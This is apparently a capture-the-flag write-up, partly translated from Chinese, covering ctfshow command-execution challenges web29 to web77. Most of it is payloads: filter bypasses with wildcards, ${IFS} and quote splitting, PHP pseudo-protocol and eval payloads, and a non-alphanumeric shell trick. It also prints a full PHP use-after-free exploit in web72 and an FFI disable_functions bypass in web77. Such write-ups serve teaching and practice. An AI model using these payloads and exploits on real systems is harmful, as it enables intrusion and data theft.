Getting Started with the web - Command Execution
-
- command execution
- web29
- web30
- web31
- web32
- web33
- web34
- web35
- web36
- web37
- web38
- web39
- web40
- web41
- web42
- web43
- web44
- web45
- web46
- web47
- web48
- web49
- web50
- web51
- web52
- web53
- web54
- web55
- web56
- web57
- web58
- web59
- web60
- web61
- web62
- web63
- web64
- web65
- web66
- web67
- web68-70
- web71
- web72
- web73
- web74
- web75
- web76
- web77
command execution
backtick ``
反引号``即命令替换
是指Shell可以先执行``中的命令,将输出结果暂时保存,在适当的地方输出
single quotes, double quotes
适用条件:过滤了字符串
放在shell命令中,绕过正则匹配且不影响原意
space bypass
> < <> 重定向符
%09(需要php环境)
${IFS}
$IFS$9
{cat,flag.php} //用逗号实现了空格功能
%20
%09
Read file bypass (cat bypass)
适用条件:过滤了cat
1)more:一页一页的显示档案内容
(2)less:与 more 类似,但是比 more 更好的是,他可以[pg dn][pg up]翻页
(3)head:查看头几行
(4)tac:从最后一行开始显示,可以看出 tac 是 cat 的反向显示
(5)tail:查看尾几行
(6)nl:显示的时候,顺便输出行号
(7)od:以二进制的方式读取档案内容
(8)vi:一种编辑器,这个也可以查看
(9)vim:一种编辑器,这个也可以查看
(10)sort:可以查看
(11)uniq:可以查看
(12)file -f:报错出具体内容
grep grep test *file #在当前目录中,查找后缀有 file 字样的文件中包含 test 字符串的文件,并打印出该字符串的行
Linux wildcard bypass
适用条件:过滤了flag,没有过滤 ? *
在linux系统中 有一些通配符
匹配任何字符串/文本,包括空字符串;*代表任意字符(0个或多个) ls file *
? 匹配任何一个字符(不在括号内时)?代表任意1个字符 ls file 0
[abcd] 匹配abcd中任何一个字符
[a-z] 表示范围a到z,表示范围的意思 []匹配中括号中任意一个字符 ls file 0
The cooperation of include and pseudo-protocol
因为include包含php文件不会在页面显示出来
所以可以配合伪协议将flag.php打印,而且新的参数不会受过滤影响
web29
Topic
solution
Check the directory
Since the flag is filtered, you can use wildcards to bypass it, check flag.php,
copy the flag.php file to 1.txt and visit
web30
Topic
Solution
Filtered flag, system and php.
Use backticks to view the directory and view flag.php (flag php is filtered using wildcards)
web31
Topic
Solution
Added dots, single quotes and spaces to be filtered. We can use the eval command in the shell to perform variable nesting and replace
the payload:
c=eval($_GET[1]);&1=echo `nl flag.php `;
web32
Topic
Solution
Filtered parentheses and semicolons
%0a line breaks
include function does not need parentheses and semicolons, you can use ?> instead of
payload:
c=include%0a$_GET[1]?>&1=php://filter/convert.base64-encode/resource=flag.php
web33
Topic
solution
This question filters out a double quote, this question uses the require function
payload:
c=require$_GET[1]?>&1=php://filter/convert.base64-encode/resource=flag.php
web34
Problem
Solution
Filtering has been added:
you can still use the previous method
payload:
c=include$_GET[1]?>&1=php://filter/convert.base64-encode/resource=flag.php
web35
Solution to the topic There
are more filters <, you can still use the previous method
payload:
c=include%0a$_GET[1]?>&1=php://filter/convert.base64-encode/resource=flag.php
web36
Topic
solution
Added numbers.emmmm... You can still use the previous method. Just change to the letter
payload:
c=include%0a$_GET[a]?>&a=php://filter/convert.base64-encode/resource=flag.php
web37
Topic
Solution
The include file contains, and at the same time filters the flag, using the data pseudo-protocol
payload:
c=data://text/plain,<?php system('tac fla?.php');?>
web38
Topic
Problem Solution
PHP is filtered, and
in php, whenever it reads a php document, it looks for:
<? php ?>
It only processes the code between the above tags and leaves other code around them.
example:
<?php
echo "Hello PHP !";
?>
Output:
Hello PHP!
However, when using echo() for output, we can use a shortcut method. The above example can be output using the <?= tag, for example:
<?= "Hello PHP !"?>
Explanation: "<?=" is a short open tag in PHP, which is a shortcut for echo().
You can use short tags instead of php to execute
the payload:
1 c=data://text/plain,<?=system('tac fl*');?>
2 c=data://text/plain;base64,PD9waHAgc3lzdGVtKCdjYXQgZmxhZy5waHAnKTs/Pg==
web39
Topic
solution
payload:
c=data://text/plain,<?php echo `tac fl*`?>
c=data://text/plain,<?= system('tac fl*');?>
web40
Problem
Solution
Filtered a lot of symbols...
The title prompts payload:
c=show_source(next(array_reverse(scandir(pos(localeconv())))));
1. localeconv():返回一包含本地数字及货币格式信息的数组。其中数组中的第一个为点号(.)
2. pos():返回数组中当前元素的值
3. scandir():获取目录下的文件
4. array_reverse():将数组逆序排列
5. next():函数将内部指针指向下一元素,并输出
6. show_source()函数对文件进行语法高亮显示,是highlight_file()别名。
7. print_r(scandir(‘.’)); 查看当前目录下的所有文件名
8. current() 函数返回数组中的当前元素(单元),默认取第一个值,pos是current的别名
1. print_r() 函数用于打印变量,以更容易理解的形式展示
2. get_defined_vars() 函数返回由所有已定义变量所组成的数组。
View all variables
passed in post
Use the next function to get the array
Print the array and execute
web41
Topic
solution
Big guy WP: web41
web42
Problem
solution
/dev/null 2>&1 mainly means not to echo, let the command echo, we separate the command and
output the black hole
; //分号
| //只执行后面那条命令
|| //只执行前面那条命令
& //两条命令都会执行
&& //两条命令都会执行
payload:
c=tac flag.php;
1: > represents where to redirect, for example: echo "123" > /home/123.txt
2: /dev/null represents a null device file
3: 2> represents stderr standard error
4: & represents the same meaning, 2 >&1, which means that the output redirection of 2 is equivalent to 1
5:1 means stdout standard output, the system default value is 1, so ">/dev/null" is equivalent to "1>/dev/null" Therefore, >/dev
/ null 2>&1 can also be written as "1> /dev/null 2> &1"
?c=tac flag.php;ls
;The previous one is executed and returns the result, and the latter one is put into /dev/null
web43
Topic
solution
On this basis, it is filtered again; cat
payload:
c=cp flag.php 1.txt||
c=nl flag.php||
c=tac flag.php||
web44
topic
Solution
payload:
c=tac fl*.php||
c=cp fl*.php 1.txt||
web45
topic
Solution
%09 is the url-encoded
payload of Tab:
c=tac%09fl*.php||
web46
Problem
solution
%09 does not belong to the digital
payload:
c=tac%09fla?.php||
nl<fla''g.php||
web47
topic
Problem solution
The solution to the previous problem can also use
payload:
c=tac%09fla?.php||
web48
Topic
solution
payload:
c=tac%09fla?.php||
web49
Topic
solution
payload:
c=tac%09fla?.php||
c=nl<fla''g.php||
web50
Topic
solution
payload:
c=nl<fla''g.php||
web51
Topic
solution
payload:
c=nl<fla''g.php||
web52
Topic
Solution
Rename flag.php,
c=mv${
IFS}fla?.php${
IFS}a.txt
get
$flag="flag_here";
Obviously wrong, check the root directory and find that there is a flag
c=ls${
IFS}/||ls
Check out the directory
c=pwd||ls
Copy the flag in the root directory
c=cp${
IFS}/fla?${
IFS}/var/www/html/b.txt||ls
Access b.txt to get the flag
payload:
c=nl$IFS/fla''g||
web53
topic
<?php
if(isset($_GET['c'])){
$c=$_GET['c'];
if(!preg_match("/\;|cat|flag| |[0-9]|\*|more|wget|less|head|sort|tail|sed|cut|tac|awk|strings|od|curl|\`|\%|\x09|\x26|\>|\</i", $c)){
echo($c);
$d = system($c);
echo "<br>".$d;
}else{
echo 'no';
}
}else{
highlight_file(__FILE__);
}
Solution
$ has been released again, you can use the old method
to load:
c=ta''c${
IFS}fla?.php
web54
topic
<?php
if(isset($_GET['c'])){
$c=$_GET['c'];
if(!preg_match("/\;|.*c.*a.*t.*|.*f.*l.*a.*g.*| |[0-9]|\*|.*m.*o.*r.*e.*|.*w.*g.*e.*t.*|.*l.*e.*s.*s.*|.*h.*e.*a.*d.*|.*s.*o.*r.*t.*|.*t.*a.*i.*l.*|.*s.*e.*d.*|.*c.*u.*t.*|.*t.*a.*c.*|.*a.*w.*k.*|.*s.*t.*r.*i.*n.*g.*s.*|.*o.*d.*|.*c.*u.*r.*l.*|.*n.*l.*|.*s.*c.*p.*|.*r.*m.*|\`|\%|\x09|\x26|\>|\</i", $c)){
system($c);
}
}else{
highlight_file(__FILE__);
}
Solution
Check the directory and rename flag.php,
c=mv${
IFS}f???.php${
IFS}a.txt
Visit the flag.
web55
topic
<?php
// 你们在炫技吗?
if(isset($_GET['c'])){
$c=$_GET['c'];
if(!preg_match("/\;|[a-z]|\`|\%|\x09|\x26|\>|\</i", $c)){
system($c);
}
}else{
highlight_file(__FILE__);
}
Problem solution
emmm...filtered letters
Solution one
bin directory
bin为binary的简写主要放置一些 系统的必备执行档例如:cat、cp、chmod df、dmesg、gzip、kill、ls、mkdir、more、mount、rm、su、tar、base64等
这里我们可以利用 base64 中的64 进行通配符匹配 即 /bin/base64 flag.php
payload:
c=/???/????64%20????.???
Solution two
/usr/bin directory
Mainly place the necessary execution files of some application software tools such as c++, g++, gcc, chdrv, diff, dig, du, eject, elm, free, gnome*, zip, htpasswd, kfm, ktop, last, less, locale, m4 , make, man, mcopy, ncftp, newaliases, nslookup passwd, quota, smb*, wget, etc.
We can use bzip2 under /usr/bin, which means that we compress the flag.php file first, and then download the
payload:
先?c=/???/???/????2 ????.???
然后在url + /flag.php.bz2 下载文件
Solution three
The improvement of non-alphanumeric webshell
can be used under the shell. To execute any script,
you can send a POST package for uploading files. As long as php receives the uploaded POST request (temporary files will be deleted after the request ends), it will upload us The file is saved in the temporary folder, the default file name is /tmp/phpXXXXXX, the last 6 characters of the file name are random uppercase and lowercase letters and numbers
Write a post upload form
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>POST数据包POC</title>
</head>
<body>
<form action="http://99da1d95-7eb6-468a-b044-cf1b1b5b393d.challenge.ctf.show/" method="post" enctype="multipart/form-data">
<!--目标网址-->
<label for="file">文件名:</label>
<input type="file" name="file" id="file"><br>
<input type="submit" name="submit" value="提交">
</form>
</body>
</html>
Construct POC
Note: The shell program must start with "#!/bin/sh", #!/bin/sh means that this script uses /bin/sh to interpret and execute, #! is a special symbol, followed by Path to the shell that interprets this script
?c=. /???/????????[@-[]
Visit flag.php
web56
topic
<?php
// 你们在炫技吗?
if(isset($_GET['c'])){
$c=$_GET['c'];
if(!preg_match("/\;|[a-z]|[0-9]|\\$|\(|\{|\'|\"|\`|\%|\x09|\x26|\>|\</i", $c)){
system($c);
}
}else{
highlight_file(__FILE__);
}
Solution:
Filtered a few more symbols, the method is the same as web55
web57
topic
<?php
// 还能炫的动吗?
//flag in 36.php
if(isset($_GET['c'])){
$c=$_GET['c'];
if(!preg_match("/\;|[a-z]|[0-9]|\`|\|\#|\'|\"|\`|\%|\x09|\x26|\x0a|\>|\<|\.|\,|\?|\*|\-|\=|\[/i", $c)){
system("cat ".$c.".php");
}
}else{
highlight_file(__FILE__);
}
The problem solution
flag is in 36.php
This problem can be constructed by mathematical operation $(()) 36
0 can be inverted to get ~0 ~0 By inverting -1, we can add 36 -1s and then invert and output ,
where -36 is reversed to get 35, then let -37 be reversed to get 36
payload:
c=$((~$(($((~$(())))+$((~$(())))+$((~$(())))+$((~$(())))+$((~$(())))+$((~$(())))+$((~$(())))+$((~$(())))+$((~$(())))+$((~$(())))+$((~$(())))+$((~$(())))+$((~$(())))+$((~$(())))+$((~$(())))+$((~$(())))+$((~$(())))+$((~$(())))+$((~$(())))+$((~$(())))+$((~$(())))+$((~$(())))+$((~$(())))+$((~$(())))+$((~$(())))+$((~$(())))+$((~$(())))+$((~$(())))+$((~$(())))+$((~$(())))+$((~$(())))+$((~$(())))+$((~$(())))+$((~$(())))+$((~$(())))+$((~$(())))+$((~$(())))))))
web58
topic
<?php
// 你们在炫技吗?
if(isset($_POST['c'])){
$c= $_POST['c'];
eval($c);
}else{
highlight_file(__FILE__);
}
Solution
Some functions are disabled
, use scandir to view directory files
c=print_r(scandir(current(localeconv())));
payload:
c=show_source(next(array_reverse(scandir(current(localeconv())))));
c=echo file_get_contents('falg.php');
c=show_source('flag.php');
c=highlight_file("flag.php");
c=print_r(file('flag.php'));
web59
topic
<?php
// 你们在炫技吗?
if(isset($_POST['c'])){
$c= $_POST['c'];
eval($c);
}else{
highlight_file(__FILE__);
}
Solution
Some functions are disabled,
look at the directory
c=print_r(scandir(current(localeconv())));
payload:
c=show_source(next(array_reverse((scandir(current(localeconv()))))));
c=show_source('flag.php');
You can also use include
web60
topic
<?php
// 你们在炫技吗?
if(isset($_POST['c'])){
$c= $_POST['c'];
eval($c);
}else{
highlight_file(__FILE__);
}
Solution
The above payload can still be used, but some function
payloads are disabled:
c=show_source(next(array_reverse(scandir(current(localeconv())))));
c=show_source('flag.php');
c=highlight_file('flag.php');
Disabled functions found
web61
topic
<?php
// 你们在炫技吗?
if(isset($_POST['c'])){
$c= $_POST['c'];
eval($c);
}else{
highlight_file(__FILE__);
}
Problem solution
The solution to the above problem can still use
payload:
c=show_source(next(array_reverse(scandir(current(localeconv())))));
c=show_source('flag.php');
c=highlight_file('flag.php');
web62
topic
<?php
// 你们在炫技吗?
if(isset($_POST['c'])){
$c= $_POST['c'];
eval($c);
}else{
highlight_file(__FILE__);
}
Problem solution
can still be used...
payload:
c=show_source(next(array_reverse(scandir(current(localeconv())))));
c=show_source('flag.php');
c=highlight_file('flag.php');
web63
topic
<?php
// 你们在炫技吗?
if(isset($_POST['c'])){
$c= $_POST['c'];
eval($c);
}else{
highlight_file(__FILE__);
}
Solution
The payload of the previous question can still be used...
payload:
c=include('flag.php');echo $flag;
c=show_source(next(array_reverse(scandir(current(localeconv())))));
c=highlight_file('flag.php');
c=show_source('flag.php');
web64
topic
<?php
// 你们在炫技吗?
if(isset($_POST['c'])){
$c= $_POST['c'];
eval($c);
}else{
highlight_file(__FILE__);
}
answer
var_dump() 函数用于输出变量的相关信息。
get_defined_vars() 函数返回由所有已定义变量所组成的数组。
var_dump(get_defined_vars()); Check out all registered variables
We include flag.php to register variable
payload:
c=show_source(next(array_reverse(scandir(current(localeconv())))));
c=highlight_file('flag.php');
c=show_source('flag.php');
c=include('flag.php');var_dump(get_defined_vars());
web65
topic
<?php
// 你们在炫技吗?
if(isset($_POST['c'])){
$c= $_POST['c'];
eval($c);
}else{
highlight_file(__FILE__);
}
Problem solution
is still possible...
payload:
c=show_source(next(array_reverse(scandir(current(localeconv())))));
c=highlight_file('flag.php');
c=show_source('flag.php');
c=include('flag.php');var_dump(get_defined_vars());
web66
topic
<?php
// 你们在炫技吗?
if(isset($_POST['c'])){
$c= $_POST['c'];
eval($c);
}else{
highlight_file(__FILE__);
}
Solution
The above payload is no longer available. . . And show_source is disabled. . .
c=print_r(scandir('/'));
In the root directory
payload:
c=highlight_file('/flag.txt');
web67
topic
<?php
// 你们在炫技吗?
if(isset($_POST['c'])){
$c= $_POST['c'];
eval($c);
}else{
highlight_file(__FILE__);
}
Solution
payload:
c=highlight_file('/flag.txt');
web68-70
Topic
solution
Check the root directory, the flag is still in the root directory
c=var_dump(scandir('/'));
highlight_file() is also disabled, directly include include to try
the payload:
c=include('/flag.txt');
web71
Title
There is an attachment below the title, the source code is as follows
<?php
error_reporting(0);
ini_set('display_errors', 0);
// 你们在炫技吗?
if(isset($_POST['c'])){
$c= $_POST['c'];
eval($c);
$s = ob_get_contents();
ob_end_clean();
echo preg_replace("/[0-9]|[a-z]/i","?",$s);
}else{
highlight_file(__FILE__);
}
?>
Solution
Execute var_dump('/'); appear
???????: ?????_?????????() ??? ???? ???????? ??? ???????? ??????? ?? /???/???/????/?????.??? ?? ???? ?? ???????: ???_???() ??? ???? ???????? ??? ???????? ??????? ?? /???/???/????/?????.??? ?? ???? ?? ???????: ???_????() ??? ???? ???????? ??? ???????? ??????? ?? /???/???/????/?????.???(??) : ????()'? ???? ?? ???? ? 你要上天吗?
$s = ob_get_contents();// Get the data in the buffer.
ob_end_clean();//The content of the buffer will be cleared and the buffer will be closed, but the content will not be output.
The contents of the internal buffer can be copied into a string variable with the ob_get_contents() function. To output what is stored in the internal buffer, use the ob_end_flush() function. In addition, using the ob_end_clean() function will silently discard the contents of the buffer.
First get the buffer data to $s, then clear it, and then change all the numbers and lowercase letters to?
We can exit the program early through exit(); to bypass
the payload:
c=include('/flag.txt');exit();
web72
The source code of the title
is the same as the previous title
<?php
error_reporting(0);
ini_set('display_errors', 0);
// 你们在炫技吗?
if(isset($_POST['c'])){
$c= $_POST['c'];
eval($c);
$s = ob_get_contents();
ob_end_clean();
echo preg_replace("/[0-9]|[a-z]/i","?",$s);
}else{
highlight_file(__FILE__);
}
?>
Solution
The payload of the above question shows that the file cannot be found, let's check the root directory
c=var_dump(scandir('/'));exit();
The directory here is restricted by open_basedir, and ini_set() is not allowed. We can try to bypass the open_basedir restriction
emmm through the glob pseudo-protocol... After trying it, I found a flag0.txt file below, which directly contains
c=$a = "glob:///*.txt";
if ( $b = opendir($a) ) {
while ( ($file = readdir($b)) !== false ) {
echo "filename:".$file."\n";
}
closedir($b);
}
exit();
emmm...The prompt is not in the allowed path, outside of open_basedir()...
The group owner greatly provided the uaf script...Generally bypass the security directory.
<?php
function ctfshow($cmd) {
global $abc, $helper, $backtrace;
class Vuln {
public $a;
public function __destruct() {
global $backtrace;
unset($this->a);
$backtrace = (new Exception)->getTrace();
if(!isset($backtrace[1]['args'])) {
$backtrace = debug_backtrace();
}
}
}
class Helper {
public $a, $b, $c, $d;
}
function str2ptr(&$str, $p = 0, $s = 8) {
$address = 0;
for($j = $s-1; $j >= 0; $j--) {
$address <<= 8;
$address |= ord($str[$p+$j]);
}
return $address;
}
function ptr2str($ptr, $m = 8) {
$out = "";
for ($i=0; $i < $m; $i++) {
$out .= sprintf("%c",($ptr & 0xff));
$ptr >>= 8;
}
return $out;
}
function write(&$str, $p, $v, $n = 8) {
$i = 0;
for($i = 0; $i < $n; $i++) {
$str[$p + $i] = sprintf("%c",($v & 0xff));
$v >>= 8;
}
}
function leak($addr, $p = 0, $s = 8) {
global $abc, $helper;
write($abc, 0x68, $addr + $p - 0x10);
$leak = strlen($helper->a);
if($s != 8) {
$leak %= 2 << ($s * 8) - 1; }
return $leak;
}
function parse_elf($base) {
$e_type = leak($base, 0x10, 2);
$e_phoff = leak($base, 0x20);
$e_phentsize = leak($base, 0x36, 2);
$e_phnum = leak($base, 0x38, 2);
for($i = 0; $i < $e_phnum; $i++) {
$header = $base + $e_phoff + $i * $e_phentsize;
$p_type = leak($header, 0, 4);
$p_flags = leak($header, 4, 4);
$p_vaddr = leak($header, 0x10);
$p_memsz = leak($header, 0x28);
if($p_type == 1 && $p_flags == 6) {
$data_addr = $e_type == 2 ? $p_vaddr : $base + $p_vaddr;
$data_size = $p_memsz;
} else if($p_type == 1 && $p_flags == 5) {
$text_size = $p_memsz;
}
}
if(!$data_addr || !$text_size || !$data_size)
return false;
return [$data_addr, $text_size, $data_size];
}
function get_basic_funcs($base, $elf) {
list($data_addr, $text_size, $data_size) = $elf;
for($i = 0; $i < $data_size / 8; $i++) {
$leak = leak($data_addr, $i * 8);
if($leak - $base > 0 && $leak - $base < $data_addr - $base) {
$deref = leak($leak);
if($deref != 0x746e6174736e6f63)
continue;
} else continue;
$leak = leak($data_addr, ($i + 4) * 8);
if($leak - $base > 0 && $leak - $base < $data_addr - $base) {
$deref = leak($leak);
if($deref != 0x786568326e6962)
continue;
} else continue;
return $data_addr + $i * 8;
}
}
function get_binary_base($binary_leak) {
$base = 0;
$start = $binary_leak & 0xfffffffffffff000;
for($i = 0; $i < 0x1000; $i++) {
$addr = $start - 0x1000 * $i;
$leak = leak($addr, 0, 7);
if($leak == 0x10102464c457f) {
return $addr;
}
}
}
function get_system($basic_funcs) {
$addr = $basic_funcs;
do {
$f_entry = leak($addr);
$f_name = leak($f_entry, 0, 6);
if($f_name == 0x6d6574737973) {
return leak($addr + 8);
}
$addr += 0x20;
} while($f_entry != 0);
return false;
}
function trigger_uaf($arg) {
$arg = str_shuffle('AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA');
$vuln = new Vuln();
$vuln->a = $arg;
}
if(stristr(PHP_OS, 'WIN')) {
die('This PoC is for *nix systems only.');
}
$n_alloc = 10;
$contiguous = [];
for($i = 0; $i < $n_alloc; $i++)
$contiguous[] = str_shuffle('AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA');
trigger_uaf('x');
$abc = $backtrace[1]['args'][0];
$helper = new Helper;
$helper->b = function ($x) {
};
if(strlen($abc) == 79 || strlen($abc) == 0) {
die("UAF failed");
}
$closure_handlers = str2ptr($abc, 0);
$php_heap = str2ptr($abc, 0x58);
$abc_addr = $php_heap - 0xc8;
write($abc, 0x60, 2);
write($abc, 0x70, 6);
write($abc, 0x10, $abc_addr + 0x60);
write($abc, 0x18, 0xa);
$closure_obj = str2ptr($abc, 0x20);
$binary_leak = leak($closure_handlers, 8);
if(!($base = get_binary_base($binary_leak))) {
die("Couldn't determine binary base address");
}
if(!($elf = parse_elf($base))) {
die("Couldn't parse ELF header");
}
if(!($basic_funcs = get_basic_funcs($base, $elf))) {
die("Couldn't get basic_functions address");
}
if(!($zif_system = get_system($basic_funcs))) {
die("Couldn't get zif_system address");
}
$fake_obj_offset = 0xd0;
for($i = 0; $i < 0x110; $i += 8) {
write($abc, $fake_obj_offset + $i, leak($closure_obj, $i));
}
write($abc, 0x20, $abc_addr + $fake_obj_offset);
write($abc, 0xd0 + 0x38, 1, 4);
write($abc, 0xd0 + 0x68, $zif_system);
($helper->b)($cmd);
exit();
}
ctfshow("cat /flag0.txt");ob_end_flush();//需要URL编码
?>
web73
topic
Solution
var_dump() is disabled, use traversal to get the directory
c=$a=scandir("/");foreach($a as $key=>$value){
echo $key."=>".$value;}exit();
c=$a=new DirectoryIterator("glob:///*");foreach($a as $f){
echo($f->__toString().' ');}exit();
directly contains,
c=include('/flagc.txt');exit();
web74
Topic
Solution
Scanning directory
scandir() is disabled, use DirectoryIterator class
c=$a=new DirectoryIterator("glob:///*");foreach($a as $f){
echo($f->__toString().' ');}exit();
c=$a=new DirectoryIterator("/");foreach($a as $key=>$value){
echo $key."=>".$value;}exit();
directly containsc=include('/flagx.txt');exit();
web75
Solution
Scan directory c=$a=new DirectoryIterator("glob:///*");foreach($a as $f){echo($f->__toString().' ');}exit();flag36.txt
to read files through the database (do not understand.)
c=
try {
$dbh = new PDO('mysql:host=localhost;dbname=ctftraining', 'root',
'root');
foreach ($dbh->query('select load_file("/flag36.txt")') as $row) {
echo ($row[0]) . "|";
}
$dbh = null;
} catch (PDOException $e) {
echo $e->getMessage();
exit(0);
}
exit(0);
web76
Solution
Scan directoryc=$a=new DirectoryIterator("glob:///*");foreach($a as $f){echo($f->__toString().' ');}exit();
c=
try {
$dbh = new PDO('mysql:host=localhost;dbname=ctftraining', 'root',
'root');
foreach ($dbh->query('select load_file("/flag36.txt")') as $row) {
echo ($row[0]) . "|";
}
$dbh = null;
} catch (PDOException $e) {
echo $e->getMessage();
exit(0);
}
exit(0);
web77
Solution
Scanning the directory c=$a=new DirectoryIterator('glob:///*');foreach($a as $f){echo($f->__toString().' ');}exit();found a readflag, we must call that. Use FFI to bypass disable_functions
c=$ffi=FFI::cdef("int system(char *command);", "libc.so.6");$a='/readflag > 1.txt';$ffi->system($a);exit();
c=
$a=new DirectoryIterator("glob:///*");
foreach($a as $f){
echo $f." " ;
}
$ffi = FFI::cdef(
"int system(const char *command);");
$ffi->system("/readflag > 1.txt");
exit();